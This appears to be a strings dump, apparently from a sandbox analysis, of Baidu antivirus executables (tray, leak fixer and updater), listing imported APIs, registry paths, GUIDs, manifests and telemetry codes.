inflate 1.2.5 Copyright 1995-2010 Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
{C6642F75-8DBE-473d-A98B-940F84EF702C}
CreateReportClient
ReleaseReportClient
.\Global\ReportBase\msg.pb.cc
datapkg.FieldsList
datapkg.DataType
{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}
kernel32.dll
c:\clientci\workspace\bdm_v3.0_fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp
.\filedispatch\FileDispatch.pb.cc
config_service.proto
.\config_service.pb.cc
config_service.proto"(
cmd_list
.ConfigItem"@
.ResultSet
asio.misc
asio.misc error
boost thread: trying joining itself
thread.entry_event
thread.exit_event
1.0.1.1
%d.%d
d-d-d d:d:d
RegKey
RootKey
SubKey
IsNative64Key
CryptMsgGetParam
CryptMsgClose
CertFindCertificateInStore
CertFreeCertificateContext
CertCloseStore
CertGetNameStringW
CryptCATCatalogInfoFromContext
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Connection
Content-Length:%d
s.x.baidu.com
.\update.pb.cc
%s:%u
%u.%u.%u.%u
addr %s not good...
Unsupported Media Type
HTTP Version not supported
HTTP/1.0
HTTP/1.1
1.0.0.1
.\header.pb.cc
https
ftpes
ftps
tftp
% ;?:@=&,$/-_!.~*()
&#xX;
</%s>
%s="%s"
%s='%s'
<!--%s-->
<![CDATA[%s]]>
version="%s"
encoding="%s"
standalone="%s"
c:\clientci\workspace\bdm_v3.0_fix_compile\basic\Output\BinRelease\BaiduAnTray.pdb
WS2_32.dll
?TranslateMessage@IControlManger@ExpandInterface@BDMSkin@@SA_NQAUtagMSG@@@Z
BDMSkin.dll
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
BDLogicUtils.dll
BDMCommon.dll
?GetWindowsDirectoryW@utils@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ
BDMFrameWork.dll
SHDeleteKeyW
SHLWAPI.dll
GetProcessHeap
CreateIoCompletionPort
GetWindowsDirectoryW
GetSystemWindowsDirectoryW
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
RegDeleteKeyW
RegFlushKey
RegOpenKeyW
RegEnumKeyExW
RegQueryInfoKeyW
RegSetKeySecurity
RegNotifyChangeKeyValue
RegGetKeySecurity
RegOpenKeyExA
ADVAPI32.dll
ShellExecuteW
ShellExecuteExW
SHFileOperationW
SHELL32.dll
ole32.dll
OLEAUT32.dll
MSVCP80.dll
MSVCR80.dll
_amsg_exit
_wcmdln
_crt_debugger_hook
PSAPI.DLL
WTSAPI32.dll
USERENV.dll
NETAPI32.dll
imagehlp.dll
InternetCrackUrlW
HttpOpenRequestW
HttpQueryInfoW
HttpSendRequestW
WININET.dll
VERSION.dll
?SetAlpha@CBDMLabelUI@BDMSkin@@UAEXE@Z
?StartFadeInFadeOut@CBDMControlUI@BDMSkin@@UAEXEEKK_N0@Z
BaiduAnTray.exe
??_B?1??get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ@51
?get_const_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@SAABV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ
?get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ
?get_mutable_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@SAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ
?instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@0AAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@A
?is_destroyed@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@SA_NXZ
?t@?1??get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ@4V?$singleton_wrapper@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@detail@34@A
.?AVCBDCmdParser@BDMLogicMisc@@
.?AVControlMgrMsgFilter@CBDMTrayApp@@
.?AVCExternalMsgLoop@@
.?AVCBDMConfigReportRecord@@
.?AVCPluginMenuItemExecutor@@
.?AVIPluginCmdExecutor@@
.?AVCBDMLauchReportRecord@@
.?AVCBDMCommonMsgBox@@
.?AV?$BDMNotifyDelegate@VCBDMCommonMsgBox@@V1@@ExpandInterface@BDMSkin@@
.?AVReportMessageBase@ns_reportbase@ns_global@@
.?AVRegSystemCallPassThrough@ns_common@@
.?AVReportClient@ns_reportbase@ns_global@@
.?AVTSMsg@@
.?AVIBDMMsg@@
.?AVTSMsgMap@@
.?AVITSMsgMap@@
.?AVTSMsgDispatcher@@
.?AVITSMsgDispatcher@@
.?AVTSMsgStub@@
.?AVITSMsgStub@@
.?AUPluginInfoPassiveSaver@@
.?AVCCmdPluginLauncher@@
.?AVCExePluginLauncher@@
.?AVheader@http@bena@@
.?AVresponse@http@bena@@
.?AVrequest@http@bena@@
#include "windows.h"
ÿF=
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity></dependentAssembly></dependency><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><asmv3:application>
<asmv3:windowsSettings xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">
</asmv3:windowsSettings>
9(9.949:9@9
6|7u7
878W8%9s9
3i4-6}6$7F7
<$<9<?<[<
(0,0004080<0@0
7$8(8,80848
3-4I4Q4f4}4
:.;@;`;~;
6.7@7]7~7
9,:::\:}:
= >5>=>"?5?
1,2v2
203c3v3
3@4c4v4
4P5c5v5
5`6s6
3L4V4
7u7C7H7X7f7l7|7
8‘9U9l9v9
0'0-03090
7'767`8|8
:%:*:7:{:
6o6W6\6f6p6~6
5#5)565?5^5
4!4.434>4
?,?6?>?`?
5/686@6`6
5(545@5\5
:&:/:8:[:
>%>,>3>:>
0,2024282<2@2|3
2 2$2(2,20242
3 3$3(3|3
9 9$9(9,909
0$0,040@0|0
@01234567
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
\iexplore.exe
\Internet Explorer\iexplore.exe
%s\baidubrowser.exe
HKEY_LOCAL_MACHINE\Software
HKEY_CURRENT_USER\Software\Classes\CLSID
HKEY_CURRENT_USER\Software\Classes\DirectShow
HKEY_CURRENT_USER\Software\Classes\Interface
HKEY_CURRENT_USER\Software\Classes\Media Type
HKEY_CURRENT_USER\Software\Classes\MediaFoundation
HKEY_CLASSES_ROOT\CLSID
HKEY_CLASSES_ROOT\DirectShow
HKEY_CLASSES_ROOT\Interface
HKEY_CLASSES_ROOT\Media Type
HKEY_CLASSES_ROOT\MediaFoundation
HKEY_LOCAL_MACHINE\Software\Wow6432Node
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\CLSID
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\DirectShow
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Interface
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Media Type
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\MediaFoundation
HKEY_CLASSES_ROOT\Wow6432Node\CLSID
HKEY_CLASSES_ROOT\Wow6432Node\DirectShow
HKEY_CLASSES_ROOT\Wow6432Node\Interface
HKEY_CLASSES_ROOT\Wow6432Node\Media Type
HKEY_CLASSES_ROOT\Wow6432Node\MediaFoundation
%d.%d.%d.%d
ntdll.dll
EXPLORER.EXE
explorer.exe
BDMNet.dll
BaiduHips.exe
UDP-ADM_DRVE_ISTL_FID
UDP-ADM_DRVE_OPEN_FID
bdmantivirus\BDKitUtils.dll
system32\DRIVERS\BDMWrench.sys
%s\baidu\baiduan\Config\8001.dat
BaiduAnSvc.exe
%Program Files% (x86)\Baidu
%Program Files%\Baidu
D:\Program Files (x86)\Baidu
D:\Program Files\Baidu
E:\Program Files (x86)\Baidu
E:\Program Files\Baidu
F:\Program Files (x86)\Baidu
F:\Program Files\Baidu
%s\BaiduHips.exe
BaiduProtect.exe
"%s\BaiduProtect.exe" -r
BDMReport.dll
%Program Files% (x86)\Common Files\Baidu
%Program Files%\Common Files\Baidu
D:\Program Files (x86)\Common Files\Baidu
D:\Program Files\Common Files\Baidu
E:\Program Files (x86)\Common Files\Baidu
E:\Program Files\Common Files\Baidu
F:\Program Files (x86)\Common Files\Baidu
F:\Program Files\Common Files\Baidu
%s\baidu\baidusd\Config\900.dat
BaiduSdTray.exe
BaiduSdSvc.exe
"%s\BaiduSdSvc.exe" -r
"%s\BaiduAnSvc.exe" -r
xx
\\.\BDMWrench
Global\BDDefenseDriver{80438582-0F66-44E0-3D2B-2D7E872CBFBB}
CD61BB3A-403D-7650-5D9A-4E57EA1035E6
UDP-ADM_KITUTL_PH_SET_INVALID
UDP-ADM_WMWCH_PH_SET_INVALID
UDP-ADM_ST_ID:%d
UDP-ADM_DRVE_RUN
UDP-ADM_CLIENT_RUN
UDP-ADM_CPY_SYS_FID
UDP-ADM_OPEN_SYS_FID
UDP-ADM_INST_SYS_FID
UDP-ADM_SED_PAVER_FID
UDP-ADM_ATR_SET
UDP-ADM_SED_ATR_FID
UDP-ADM_SED_FSD
UDP-ADM_RPT_FID
UDP-ADM_FSD
\BaiduSdSvc.exe
\BaiduAnSvc.exe
UDP-ADM_RPT_INIT_FID
\system32\drivers\BDMWrench.sys
drivers\BDMWrench.sys
UDP-EVT_WFR
UDP-EVT_WFID
UDP-ADM_SED_PAVER2_FID
\BaiduSdTray.exe" -stmd=3
\BaiduAnTray.exe" -stmd=3
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
C9521EC1-6642-5CF6-8FB9-DE04639593BD
UDP-PS_KITUTI_PH_SET_INVALID
UDP-PS_LD_FID
UDP-PL_SRV_ID:%d
UDP-PL_SRV_RUN
UDP-PL_SRV_INSTPH_FID
UDP-PL_SRV_CK_REG_DAMG
UDP-PL_SRV_REPT01_FID
UDP-PL_SRV_REGREPIR_FID
UDP-PL_SRV_PL_FID
UDP-PL_SRV_REPT02_FID
UDP-PL_SRV_FSD
UDP-PL_TRY_ID:%d
UDP-PL_TRY_RUN
UDP-PL_TRY_INSTPH_FID
UDP-PL_TRY_UN_ATRUN
UDP-PL_TRY_REPT01_FID
UDP-PL_TRY_PL_FID
UDP-PL_TRY_REPT02_FID
UDP-PL_TRY_FSD
UDP-PL_RPT_INIT_FID
UDP-ADM_SET_KITU
UDP-ADM_SET_MWR_PATH
UDP-ADM_OS_ERR
UDP-ADM_PROC_DIR_UN_EXIST
UDP-ADM_PROC_GT_VER_FID
UDP-ADM_PROC_MATCH_FID
BaiduAnSvc.exe" -r
BDMDownload.dll
BDMUpdate.dll
uninst.exe
%s%d\%lld\
Download.data
download.db
publish.db
profile.db
%d_id
%d_version
%d_customer
%s%d\
metadata.db
NewTab_ErrorURL
\updateTips.dat
%s\FTSWManager\%s
sw_property.dat
sw_class_filter.db
{AF849809-EC94-47CB-80E9-1452BEC92ADA}
Baiduan.exe -stmd=2 -selplugin={D886CCB7-9946-4246-9502-D25F2F948431}\{BFB3F7A3-4FA1-466f-AB97-A96EFA9EFA6E}\{D8CD8DC5-D053-402a-99D9-47554C744B0C}
Onekey
Baiduan.exe -selplugin={D886CCB7-9946-4246-9502-D25F2F948431}\{BFB3F7A3-4FA1-466f-AB97-A96EFA9EFA6E}\{D8CD8DC5-D053-402a-99D9-47554C744B0C}
IconMsgWndClass
{1CB69707-E42B-4128-8A00-7336B93DC262}
baiduan.exe -stmd=6
{E9C9ED70-127F-4BE4-9821-74160A768A90}
{7576896A-4E2F-4665-AB7D-95938D2632F1}
{F5E93978-539C-476B-9A7B-B6C32025A557}
{BFB3F7A3-4FA1-466f-AB97-A96EFA9EFA6E}
{D8CD8DC5-D053-402a-99D9-47554C744B0C}
{5DF529E5-045B-4f5d-9F08-9F5328008DF7}
BDASoftmgr.exe -sm -openby=bdmtray
BDMgr.exe -stmd=7
BDMgr.exe -stmd=6
hXXp://weishi.baidu.com/feedback/
TrayPluginContainerConfig.xml
{E059A29F-D2ED-4f28-849A-851AA9D5A05C}
ic_info_64.png
ic_warning_48.png
ic_question_48.png
ic_done_48.png
QQ.exe
screen_snapshot.exe
SnippingTool.exe
CommonRes.rdb
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduAn
1800000
BDASoftmgr.exe
BDASWDeskGuide.exe
BaiduAnBugRpt.exe
BaiduAn.exe
BaiduAnUpdate.exe
CommonMsgBox
Client.exe
\GameNoDisturb.ini
Shell32.dll
FreeDistractionTips.xml
BaiduAn{D8A4131D-3A7A-48a1-B080-28E1DC04F7C2}
TrayMenu.xml
Config\config.ini
%d-%d-%d
btn_switch_on_normal.png
ActivateTrayApp_{E6F42A49-F45B-4FDF-ADD8-DFAE10011BD1}
{94F31545-51B0-433d-B3E2-7D3A0C6482F2}
ActivateMainApp_{6AD16C03-B3BA-4b15-B502-A0A603DC8092}\{5DF529E5-045B-4f5d-9F08-9F5328008DF7}
btn_switch_on_hover.png
btn_switch_on_pressed.png
btn_switch_off_normal.png
btn_switch_off_hover.png
btn_switch_off_pressed.png
3.0.0.185
hXXp://weishi.baidu.com
hXXp://weishi.baidu.com/privacy.html
about.xml
kBDMNet.dll
c:\bd_swtray_log.txt
%s:%d
D:\BDdownloads
QueryIpcAddressHelper
testtips.xml
Global\{74B41C93-AC9A-4a9e-85E0-27A02EA509FA}
Mfile='skin_image16.png' xtiled='true' ytiled='true'
skin_image16.png
file='%s' xtiled='true' ytiled='true'
B\\.\pipe\{B99F6A00-E6C9-4253-9708-C6EFB939FD53}
CommonMsgBox.xml
\kernel32.dll
Windows 8.1
Windows 8.0
Windows 7
Windows Vista
Windows 7
Windows Vista
Windows Server 2003,
Windows XP
Windows 2000
Windows NT
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
Windows 95
Windows 98
Windows ME
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
okernel32.dll
HKEY_USERS
LKernel32.dll
xxxxxxxxxxxxxxxx
Software\Microsoft\Windows NT\CurrentVersion\Time Zones\
Software\Microsoft\Windows NT\CurrentVersion\ProfileList\
Software\Microsoft\Windows NT\CurrentVersion\Print\
Software\Microsoft\Windows NT\CurrentVersion\Ports\
Software\Microsoft\Windows NT\CurrentVersion\Perflib\
Software\Microsoft\Windows NT\CurrentVersion\NetworkCards\
Software\Microsoft\Windows NT\CurrentVersion\Language Pack\
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Software\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\
Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\
Software\Microsoft\Windows NT\CurrentVersion\Fonts\
Software\Microsoft\Windows NT\CurrentVersion\FontMapper\
Software\Microsoft\Windows NT\CurrentVersion\FontLink\
Software\Microsoft\Windows NT\CurrentVersion\FontDpi\
Software\Microsoft\Windows NT\CurrentVersion\Console\
Software\Microsoft\Windows\CurrentVersion\Telephony\Locations\
Software\Microsoft\Windows\CurrentVersion\Setup\
Software\Microsoft\Windows\CurrentVersion\PreviewHandlers\
Software\Microsoft\Windows\CurrentVersion\Policies\
Software\Microsoft\Windows\CurrentVersion\Group Policy\
Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap\
Software\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\
Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\
Software\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\
Software\Microsoft\Windows\CurrentVersion\App Paths\
Software\Microsoft\SystemCertificates\
Software\Microsoft\EnterpriseCertificates\
system32\winlogon.exe
\Global.db
BWintrust.dll
Crypt32.dll
iphlpapi.dll
B\\.\PhysicalDrive%d
\\.\Scsi%d:
B6BE417DD-264A-4678-A036-74D2173ECCEB
d-d-d
L{X-X-X-XX-XXXXXX}
D823ABCA-A92F-429d-9E11-3779B5F682AA
\NotInstalledPlugin.xml
\GlobalPluginInfo.xml
\LocalPluginInfo.xml
\PluginSetup.xml
\HotPlugins.xml
\HotPlugin.bnr
PluginSetup.xml
{E5B65788-3C2C-4F59-92E7-58C9205BC66E}
C##cmd:
DUninstalledPlugins.xml
/handle=%d /supplyid=%d /installmode=2 /S /D=%s
PackCache.xml
BDMUPDATE_{626ADED9-5989-4e97-A482-09AC95C17D47}
.bdtmp
.old_
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0
0123456789
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Config\
BaiduanTray.exe

BDALeakfixer.exe_3188:

.text
`.rdata
@.data
.rsrc
@.reloc
PSSSSSSh
asio.misc
asio.misc error
c:\clientci\workspace\bdm_v3.0_fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp
inflate 1.2.5 Copyright 1995-2010 Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
CryptMsgGetParam
CryptMsgClose
CertFindCertificateInStore
CertFreeCertificateContext
CertCloseStore
CertGetNameStringW
CryptCATCatalogInfoFromContext
&#xX;
</%s>
%s="%s"
%s='%s'
<!--%s-->
<![CDATA[%s]]>
version="%s"
encoding="%s"
standalone="%s"
c:\clientci\workspace\bdm_v3.0_fix_compile\basic\Output\BinRelease\BDALeakfixer.pdb
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
BDLogicUtils.dll
?GetWindowsDirectoryW@utils@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ
BDMFrameWork.dll
SHLWAPI.dll
BDMSkin.dll
GetWindowsDirectoryW
GetProcessHeap
KERNEL32.dll
USER32.dll
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
ShellExecuteW
ShellExecuteExW
SHFileOperationW
SHELL32.dll
ole32.dll
MSVCR80.dll
_amsg_exit
_wcmdln
_crt_debugger_hook
MSVCP80.dll
WS2_32.dll
imagehlp.dll
GetSystemWindowsDirectoryW
RegDeleteKeyW
RegCreateKeyExW
.?AVCBDCmdParser@BDMLogicMisc@@
.?AVTSMsg@@
.?AVIBDMMsg@@
.?AVTSMsgMap@@
.?AVITSMsgMap@@
.?AVTSMsgDispatcher@@
.?AVITSMsgDispatcher@@
.?AVTSMsgStub@@
.?AVITSMsgStub@@
.?AUPluginInfoPassiveSaver@@
.?AVCCmdPluginLauncher@@
.?AVCExePluginLauncher@@
.?AVIPluginCmdExecutor@@
ÿF=
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity></dependentAssembly></dependency><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS>
77X7
0#0*070_0
11
=#=5=:=^=
00S0Z0f0w0
>%>,>3>:>
6 6$6(6,60646
download.db
publish.db
profile.db
BDALeakfixer.exe
BaiduAn{BCAE54CF-7A1E-4842-908B-3D0AEF98409B}
PatcherContainer.xml
D{0C8BFEC2-961C-4777-ADBE-522A06690AD9}
BaiduAn.exe
BaiduAnTray.exe
\\.\pipe\{B99F6A00-E6C9-4253-9708-C6EFB939FD53}
Global\{74B41C93-AC9A-4a9e-85E0-27A02EA509FA}
Kernel32.dll
Dxxxxxxxxxxxxxxxx
Wintrust.dll
Crypt32.dll
6BE417DD-264A-4678-A036-74D2173ECCEB
D823ABCA-A92F-429d-9E11-3779B5F682AA
\NotInstalledPlugin.xml
\GlobalPluginInfo.xml
\LocalPluginInfo.xml
\PluginSetup.xml
\HotPlugins.xml
\HotPlugin.bnr
PluginSetup.xml
{E5B65788-3C2C-4F59-92E7-58C9205BC66E}
BPackCache.xml
BDMDownload.dll
B/handle=%d /supplyid=%d /installmode=2 /S /D=%s
%d.%d
##cmd:
UninstalledPlugins.xml
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion\Time Zones\
Software\Microsoft\Windows NT\CurrentVersion\ProfileList\
Software\Microsoft\Windows NT\CurrentVersion\Print\
Software\Microsoft\Windows NT\CurrentVersion\Ports\
Software\Microsoft\Windows NT\CurrentVersion\Perflib\
Software\Microsoft\Windows NT\CurrentVersion\NetworkCards\
Software\Microsoft\Windows NT\CurrentVersion\Language Pack\
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Software\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\
Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\
Software\Microsoft\Windows NT\CurrentVersion\Fonts\
Software\Microsoft\Windows NT\CurrentVersion\FontMapper\
Software\Microsoft\Windows NT\CurrentVersion\FontLink\
Software\Microsoft\Windows NT\CurrentVersion\FontDpi\
Software\Microsoft\Windows NT\CurrentVersion\Console\
Software\Microsoft\Windows\CurrentVersion\Telephony\Locations\
Software\Microsoft\Windows\CurrentVersion\Setup\
Software\Microsoft\Windows\CurrentVersion\PreviewHandlers\
Software\Microsoft\Windows\CurrentVersion\Policies\
Software\Microsoft\Windows\CurrentVersion\Group Policy\
Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap\
Software\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\
Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\
Software\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\
Software\Microsoft\Windows\CurrentVersion\App Paths\
Software\Microsoft\SystemCertificates\
Software\Microsoft\EnterpriseCertificates\
system32\winlogon.exe
{X-X-X-XX-XXXXXX}
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Config\
3.0.0.3971
BDLeakfixer.exe

BaiduAnUpdate.exe_3124:

.text
`.rdata
@.data
.rsrc
@.reloc
PSSSSSSh
SShwB
%D|PFB|
..\src\google\protobuf\message_lite.cc
CHECK failed: !coded_out.HadError():
%d.%d.%d
libprotobuf %s %s:%d] %s
..\src\google\protobuf\stubs\common.cc
..\src\google\protobuf\io\coded_stream.cc
..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc
inflate 1.2.5 Copyright 1995-2010 Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
{0F7048BB-E983-47bb-825E-0C2BF9F95719}
{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}
&#xX;
</%s>
%s="%s"
%s='%s'
<!--%s-->
<![CDATA[%s]]>
version="%s"
encoding="%s"
standalone="%s"
1.0.1.1
%d.%d
d-d-d d:d:d
RegKey
RootKey
SubKey
IsNative64Key
CryptMsgGetParam
CryptMsgClose
CertFindCertificateInStore
CertFreeCertificateContext
CertCloseStore
CertGetNameStringW
CryptCATCatalogInfoFromContext
Content-Length:%d
s.x.baidu.com
c:\clientci\workspace\bdm_v3.0_fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp
.\update.pb.cc
%s:%u
%u.%u.%u.%u
addr %s not good...
Unsupported Media Type
HTTP Version not supported
HTTP/1.0
HTTP/1.1
1.0.0.1
.\header.pb.cc
https
ftpes
ftps
tftp
% ;?:@=&,$/-_!.~*()
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Connection
c:\clientci\workspace\bdm_v3.0_fix_compile\basic\Output\BinRelease\BaiduAnUpdate.pdb
?StartFadeInFadeOut@CBDMControlUI@BDMSkin@@UAEXEEKK_N0@Z
?SetAlpha@CBDMLabelUI@BDMSkin@@UAEXE@Z
BDMSkin.dll
BDMFrameWork.dll
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
BDLogicUtils.dll
IMM32.dll
SHDeleteKeyW
SHLWAPI.dll
GetProcessHeap
GetWindowsDirectoryW
GetSystemWindowsDirectoryW
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
RegCreateKeyExW
RegSetKeySecurity
RegFlushKey
RegNotifyChangeKeyValue
RegGetKeySecurity
RegDeleteKeyW
ADVAPI32.dll
ShellExecuteW
SHFileOperationW
ShellExecuteExW
SHELL32.dll
ole32.dll
MSVCP80.dll
PSAPI.DLL
MSVCR80.dll
_amsg_exit
_wcmdln
_crt_debugger_hook
WTSAPI32.dll
USERENV.dll
imagehlp.dll
InternetCrackUrlW
HttpOpenRequestW
HttpQueryInfoW
HttpSendRequestW
WININET.dll
NETAPI32.dll
?GetWindowsDirectoryW@utils@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ
WS2_32.dll
RegOpenKeyExA
BaiduAnUpdate.exe
.?AVCCmdLine@@
.?AVCBDCmdParser@BDMLogicMisc@@
.?AVCBDMCommonMsgBox@@
.?AV?$BDMNotifyDelegate@VCBDMCommonMsgBox@@V1@@ExpandInterface@BDMSkin@@
.?AVTSMsg@@
.?AVIBDMMsg@@
.?AVTSMsgDispatcher@@
.?AVITSMsgDispatcher@@
.?AVTSMsgStub@@
.?AVITSMsgStub@@
.?AVTSMsgMap@@
.?AVITSMsgMap@@
.?AUPluginInfoPassiveSaver@@
.?AVheader@http@bena@@
.?AVresponse@http@bena@@
.?AVrequest@http@bena@@
ÿF=
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50727.4053" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity></dependentAssembly></dependency><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><asmv3:application>
<asmv3:windowsSettings xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">
</asmv3:windowsSettings>
5%5S5g5y5
1,2
5%5s5x5
i0-2}2$3F3
='=6=`>|>
0%0*070{0
<#<.<8<~<
4L4U4s4y4
3<3j3
> >$>(>,>0>4>8>
? ?$?(?,?0?4?8?<?
HKEY_LOCAL_MACHINE\Software
HKEY_CURRENT_USER\Software\Classes\CLSID
HKEY_CURRENT_USER\Software\Classes\DirectShow
HKEY_CURRENT_USER\Software\Classes\Interface
HKEY_CURRENT_USER\Software\Classes\Media Type
HKEY_CURRENT_USER\Software\Classes\MediaFoundation
HKEY_CLASSES_ROOT\CLSID
HKEY_CLASSES_ROOT\DirectShow
HKEY_CLASSES_ROOT\Interface
HKEY_CLASSES_ROOT\Media Type
HKEY_CLASSES_ROOT\MediaFoundation
HKEY_LOCAL_MACHINE\Software\Wow6432Node
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\CLSID
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\DirectShow
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Interface
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Media Type
